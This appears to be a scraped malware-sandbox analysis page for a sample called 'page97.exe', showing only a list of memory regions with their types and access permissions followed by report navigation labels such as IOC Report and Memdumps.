7FF848F40000

trusted library allocation

page execute and read and write

6EBB40D000

stack

page read and write

184BC14F000

heap

page read and write

184BC1B3000

heap

page read and write

1ABAC000

stack

page read and write

D74417A000

stack

page read and write

6EB9EE3000

stack

page read and write

7FF8470C0000

trusted library allocation

page read and write

6EBA83E000

stack

page read and write

380000

unkown

page readonly

6EBA2FD000

stack

page read and write

184A598A000

trusted library allocation

page read and write

184A572E000

trusted library allocation

page read and write

184A3A70000

trusted library allocation

page read and write

184B3D31000

trusted library allocation

page read and write

7FF8473A0000

trusted library allocation

page read and write

6EBA7BE000

stack

page read and write

CAF000

stack

page read and write

1B20E000

stack

page read and write

184A2280000

heap

page read and write

6EBA6B8000

stack

page read and write

1B84C000

heap

page read and write

6EB9F6E000

stack

page read and write

184A2289000

heap

page read and write

8BC000

heap

page read and write

12621000

trusted library allocation

page read and write

184A2120000

heap

page read and write

184BC250000

heap

page read and write

D7444FF000

stack

page read and write

7FF848E2D000

trusted library allocation

page execute and read and write

6EBA27E000

stack

page read and write

99F000

heap

page read and write

184A2199000

heap

page read and write

860000

heap

page read and write

7F0000

heap

page read and write

184A21A3000

heap

page read and write

7FF8470B0000

trusted library allocation

page read and write

7FF848E32000

trusted library allocation

page read and write

20D8CDD0000

heap

page read and write

7FF8473F0000

trusted library allocation

page read and write

7FF847255000

trusted library allocation

page read and write

24D0000

heap

page execute and read and write

7FF847160000

trusted library allocation

page execute and read and write

7FF8472E0000

trusted library allocation

page read and write

8FC000

heap

page read and write

7FF847320000

trusted library allocation

page read and write

20D8EDA0000

heap

page read and write

184A21F1000

heap

page read and write

D744DFB000

stack

page read and write

8E5000

heap

page read and write

184B3EE6000

trusted library allocation

page read and write

7FF8473D0000

trusted library allocation

page read and write

810000

heap

page read and write

8F9000

heap

page read and write

7FF8470A3000

trusted library allocation

page execute and read and write

184A572C000

trusted library allocation

page read and write

7FF8472A0000

trusted library allocation

page read and write

7FF848EE0000

trusted library allocation

page execute and read and write

1B30E000

stack

page read and write

184A21D3000

heap

page read and write

6EB9FEE000

stack

page read and write

184A5374000

trusted library allocation

page read and write

184A2425000

heap

page read and write

184A3DB4000

trusted library allocation

page read and write

6EBA73F000

stack

page read and write

184A535D000

trusted library allocation

page read and write

D744BFE000

stack

page read and write

184BC127000

heap

page execute and read and write

1B869000

heap

page read and write

975000

heap

page read and write

7FF847259000

trusted library allocation

page read and write

7FF848F06000

trusted library allocation

page execute and read and write

184A5986000

trusted library allocation

page read and write

7FF8473B0000

trusted library allocation

page read and write

382000

unkown

page readonly

1B82B000

stack

page read and write

184BC217000

heap

page read and write

184BC352000

heap

page read and write

7FF847300000

trusted library allocation

page read and write

7FF847350000

trusted library allocation

page read and write

184A3B20000

heap

page execute and read and write

D7445FF000

stack

page read and write

855000

heap

page read and write

184BC17E000

heap

page read and write

1B62E000

stack

page read and write

7FF848E34000

trusted library allocation

page read and write

8F6000

heap

page read and write

7FF847310000

trusted library allocation

page read and write

184BC1F1000

heap

page read and write

7FF847340000

trusted library allocation

page read and write

20D8EA50000

heap

page read and write

184A21D5000

heap

page read and write

7FF8473E0000

trusted library allocation

page read and write

6EBA47E000

stack

page read and write

6EBA37F000

stack

page read and write

184A3AE0000

trusted library allocation

page read and write

380000

unkown

page readonly

850000

heap

page read and write

7FF847282000

trusted library allocation

page read and write

There are 202 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
page97.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportpage97.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
page97.exe